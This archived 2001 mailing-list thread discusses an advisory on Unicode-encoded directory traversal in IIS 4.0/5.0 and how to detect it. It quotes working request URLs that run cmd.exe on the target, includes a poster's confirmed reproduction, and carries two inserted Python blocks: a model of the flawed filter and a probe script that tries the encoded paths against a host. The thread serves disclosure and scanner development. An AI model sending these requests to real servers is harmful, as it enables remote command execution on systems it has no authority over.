Mailing List Archive

Fw: New vulnerability in IIS4.0/5.0
I just wrote a NASL for this bug. It's untested, but I hope it works.
The problem was that I found no IIS where I could reproduce this error (I tested
five IIS 4 and IIS 5 boxes).
I will improve it when I find a working box ...

Btw: I also updated the CF Admin Test.


MfG
Felix Huber


-------------------------------------------------------
Felix Huber, Security Consultant, Webtopia
Guendlinger Str.2, 79241 Ihringen - Germany
huberfelix@webtopia.de (07668) 951 156 (phone)
http://www.webtopia.de (07668) 951 157 (fax)
(01792) 205 724 (mobile)
-------------------------------------------------------


From: "ALife // BERG" <buginfo@inbox.ru>
To: <Bugtraq@securityfocus.com>
Sent: Wednesday, September 19, 2001 11:38 AM
Subject: New vulnerability in IIS4.0/5.0


> -----[ Bright Eyes Research Group | Advisory # be00001e ]-----------------
>
> Remote users can execute any command on several
> IIS 4.0 and 5.0 systems by using UTF codes
>
> -------------------------------------[ security.instock.ru ]--------------
>
> Topic: Remote users can execute any command on several
> IIS 4.0 and 5.0 systems by using UTF codes
>
> Announced: 2001-09-19
> Credits: ALife <buginfo@inbox.ru>
> Affects: Microsoft IIS 4.0/5.0
>
> --------------------------------------------------------------------------
>
> ---[. Description
>
> For example, the target has an executable virtual directory (e.g.
> "scripts") that is located on the same drive as the Windows system.
> Submit request like this:
>
> http://target/scripts/..%u005c..%u005cwinnt/system32/cmd.exe?/c+dir+c:\
>
> Directory list of C:\ will be revealed.
>
> Of course, the same effect can be achieved by applying this kind of
> processing to '/' and '.'. For example: "..%u002f", ".%u002e/",
> "..%u00255c", "..%u0025%u005c" ...
>
> Note: the attacker can run commands only with the privileges of the
> IUSR_machinename account.
>
> This is where things go wrong in IIS 4.0 and 5.0: IIS first scans
> the given URL for ../ and ..\ and for the normal Unicode encodings of
> these strings; if those are found, the string is rejected, and if they
> are not found, the string is decoded and interpreted. Since the filter
> does NOT check for the huge number of overlong Unicode representations
> of ../ and ..\, the filter is bypassed and the directory traversal
> routine is invoked.
>
> ---[. Workarounds
>
> 1. Delete executable virtual directories such as /scripts.
> 2. If an executable virtual directory is needed, we suggest assigning
> it a separate local drive.
> 3. Move all command-line utilities that could be used by an attacker
> to another directory, and forbid the GUEST group access to those
> utilities.
>
> ---[. Vendor Status
>
> 2001.09.19 We informed Microsoft of this vulnerability.
>
> ---[ Additional Information
>
> [1] RFC 1642 / RFC 2152: UTF-7, A Mail-Safe Transformation Format of Unicode.
> [2] RFC 2044 / RFC 2279: UTF-8, a transformation format of Unicode and ISO 10646.
> [3] RFC 2253: Lightweight Directory Access Protocol (v3): UTF-8 String
> Representation of Distinguished Names.
>
> ---[. DISCLAIMER
>
> THE INFORMATION PROVIDED IS RELEASED BY BRIGHT EYES RESEARCH GROUP (BERG)
> "AS IS" WITHOUT WARRANTY OF ANY KIND. BERG DISCLAIMS ALL WARRANTIES,
> EITHER EXPRESS OR IMPLIED, EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY.
> IN NO EVENT SHALL BERG BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING
> DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR
> SPECIAL DAMAGES, EVEN IF BERG HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH
> DAMAGES. DISTRIBUTION OR REPRODUCTION OF THE INFORMATION IS PERMITTED
> PROVIDED THAT THE ADVISORY IS NOT MODIFIED IN ANY WAY.
>
> -------------------------------------[ security.instock.ru ]--------------
> -----[ Bright Eyes Research Group | Advisory # be00001e ]-----------------
>
>
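The filter-order bug the advisory describes, modelled in Python as an added example (it is not IIS code and not from any poster in this thread): a check that runs on the raw URL before decoding, beside one that decodes and canonicalises first and then authorises the exact path that will be opened. The virtual-directory mapping (/scripts to C:/Inetpub/scripts), the simplified decoder and the request samples are assumptions built from the advisory's description. Besides the advisory's %u005c, %u002f, .%u002e and double-encoded %u00255c forms it also tries the older overlong UTF-8 form %c0%af of '/', which the same raw-string filter misses.

```python
"""
Model of the IIS 4/5 "filter before decode" traversal check, beside a
decode-then-check fix. Added example: not IIS code and not from any poster;
the decoder is a simplified stand-in written from the advisory's description
of %uXXXX, double-encoded and overlong forms.
"""
import posixpath
import re
from urllib.parse import unquote_to_bytes

VROOT = "/scripts"                    # assumed executable virtual directory
VDIR_ON_DISK = "C:/Inetpub/scripts"   # assumed mapping, same drive as the system root


def percent_decode_lenient(s: str) -> str:
    """%XX decoding that, like the vulnerable server, accepts overlong UTF-8
    (e.g. %c0%af -> '/') instead of rejecting it. A strict decoder must not."""
    raw = unquote_to_bytes(s)
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            # 2-byte sequence decoded without an overlong check (the flaw)
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))        # ASCII, or a stray byte kept as-is
            i += 1
    return "".join(out)


def decode_once(path: str) -> str:
    """One decoding pass: the %uXXXX form first, then %XX. '..%u00255c'
    becomes '..%5c' after the %u step and '..\\' after the %XX step."""
    path = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), path)
    return percent_decode_lenient(path)


def decode_fully(path: str, max_passes: int = 4) -> str:
    """Decode until nothing changes (bounded), so double-encoded forms resolve."""
    for _ in range(max_passes):
        new = decode_once(path)
        if new == path:
            break
        path = new
    return path


def map_to_disk(decoded_path: str) -> str:
    """Map a decoded URL path under VROOT to the file the server would open."""
    rel = decoded_path[len(VROOT):].replace("\\", "/")
    return posixpath.normpath(VDIR_ON_DISK + rel)


def vulnerable_serve(url_path: str):
    """Filter-then-decode, as the advisory describes. Returns the disk path
    that would be opened, or None if the pre-decode filter rejected it."""
    probe = url_path.lower()
    if any(p in probe for p in ("../", "..\\", "..%2f", "..%5c")):
        return None
    return map_to_disk(decode_fully(url_path))


def hardened_serve(url_path: str):
    """Decode and canonicalise first, then authorise on the exact string that
    will be opened: anything resolving outside the virtual directory is refused."""
    target = map_to_disk(decode_fully(url_path))
    if target != VDIR_ON_DISK and not target.startswith(VDIR_ON_DISK + "/"):
        return None
    return target


# Constructed requests: the advisory's encodings plus benign controls.
SAMPLES = [
    "/scripts/../../winnt/system32/cmd.exe",               # plain: filter catches it
    "/scripts/..%5c..%5cwinnt/system32/cmd.exe",           # "normal" encoding: caught
    "/scripts/..%u005c..%u005cwinnt/system32/cmd.exe",     # advisory's %u form: bypass
    "/scripts/.%u002e/.%u002e/winnt/system32/cmd.exe",     # encoded dot: bypass
    "/scripts/..%u00255c..%u00255cwinnt/system32/cmd.exe", # double-encoded %u: bypass
    "/scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe",     # overlong UTF-8 '/': bypass
    "/scripts/sub/..%2fother.asp",                         # benign, stays under /scripts
    "/scripts/test.asp",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s:55} vulnerable={vulnerable_serve(s)}  hardened={hardened_serve(s)}")
```

Run it and compare the two columns: every %u and overlong form slips past the raw-string filter and resolves to C:/winnt/system32/cmd.exe, while the canonicalise-then-check version refuses all of them and still serves /scripts/sub/..%2fother.asp, which the raw filter wrongly rejects. The point to carry over is that the authorisation decision has to be made on the same string the file-open uses; checking before decoding, or decoding again after the check, reopens the hole.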
Re: Fw: New vulnerability in IIS4.0/5.0
On Wednesday 19 September 2001 11:29 am, Felix Huber wrote:
> I just wrote a NASL for this bug. It's untested, but I hope it works.
> The problem was that I found no IIS where I could reproduce this error (I
> tested five IIS 4 and IIS 5 boxes).
> I will improve it when I find a working box ...

I too can't reproduce the problem...
Re: Fw: New vulnerability in IIS4.0/5.0
On Wed, Sep 19, 2001 at 06:29:19PM +0200, Felix Huber wrote:
> I just wrote a NASL for this bug. It's untested, but I hope it works.
> The problem was that I found no IIS where I could reproduce this error (I tested
> five IIS 4 and IIS 5 boxes).
> I will improve it when I find a working box ...

I think it would be wiser to reuse iis_dir_traversal.nasl, which was
heavily worked on and which does not only check for /scripts.

Attached is a modified version of it (but I don't know whether it works or
not; I could not reproduce the flaw yet).


-- Renaud
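What an active check along the lines Renaud suggests looks like, as an added example: it is neither iis_dir_traversal.nasl nor Felix's script, but a small Python probe that tries several executable virtual directories with several encodings of "..\" and "../" and recognises the output of dir. The directory list, the set of encodings, the traversal depth of four (the depth used in the /msadc reproduction later in this thread) and the response markers are assumptions.

```python
"""
Minimal active check for the %u / overlong-encoding traversal, in the spirit
of the NASL scripts discussed in the thread. Added example: not
iis_dir_traversal.nasl and not any poster's code; VDIRS, SEPARATORS, DEPTH
and LISTING_MARKERS are assumptions.
"""
import http.client
from typing import Iterator, Optional

# Executable virtual directories often present on IIS 4/5 installs (assumed).
VDIRS = ["/scripts", "/msadc", "/cgi-bin", "/_vti_bin", "/iisadmpwd", "/samples"]

# Encodings of "..\" and "../" from the advisory, the overlong UTF-8 form,
# and two plain forms as controls that a patched filter should block.
SEPARATORS = ["..%u005c", "..%u002f", "..%u00255c", "..%c0%af", "..%5c", "../"]
DEPTH = 4                                        # enough to reach the drive root
COMMAND = "winnt/system32/cmd.exe?/c+dir+c:\\"   # read-only: lists the drive root

# Strings that cmd.exe's "dir" prints; two are required so an error page that
# merely echoes the request is not counted as a hit.
LISTING_MARKERS = ("Volume in drive", "Directory of", "<DIR>")


def build_probe_paths() -> Iterator[str]:
    """Yield every directory/encoding combination to request."""
    for vdir in VDIRS:
        for sep in SEPARATORS:
            yield vdir + "/" + sep * DEPTH + COMMAND


def is_directory_listing(body: str) -> bool:
    """True when the response body looks like the output of 'dir c:\\'."""
    return sum(marker in body for marker in LISTING_MARKERS) >= 2


def probe_host(host: str, port: int = 80, timeout: float = 5.0) -> Optional[str]:
    """Send each probe; return the first path that produced a listing, else None."""
    for path in build_probe_paths():
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
        try:
            conn.request("GET", path, headers={"Host": host})
            resp = conn.getresponse()
            body = resp.read(4096).decode("latin-1", errors="replace")
        except (OSError, http.client.HTTPException):
            continue
        finally:
            conn.close()
        if resp.status == 200 and is_directory_listing(body):
            return path
    return None


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        hit = probe_host(sys.argv[1])
        print("vulnerable via " + hit if hit else "no listing obtained")
    else:
        for p in build_probe_paths():   # no host given: just show what would be sent
            print(p)
```

Without a host argument the script only prints the request paths it would send, which is the quickest way to review them before pointing it at a system you are authorised to test. The command is a plain dir so a hit changes nothing on the target; a 200 whose body lacks the listing markers is reported as a miss, not a hit.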
Re: Fw: New vulnerability in IIS4.0/5.0
Reproduced against two default IIS installs (4.0 and 5.0):

http://host/msadc/..%u00255c..%u00255c..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir+c:\

These boxes were vulnerable to unicode and the double decode, so I can't say
for certain whether this affects patched systems.



On Wednesday 19 September 2001 11:29 am, Felix Huber wrote:
> I just wrote a NASL for this bug. It's untested, but I hope it works.
> The problem was that I found no IIS where I could reproduce this error (I
> tested five IIS 4 and IIS 5 boxes).
> I will improve it when I find a working box ...

--
H D Moore
http://www.digitaldefense.net - work
http://www.digitaloffense.net - play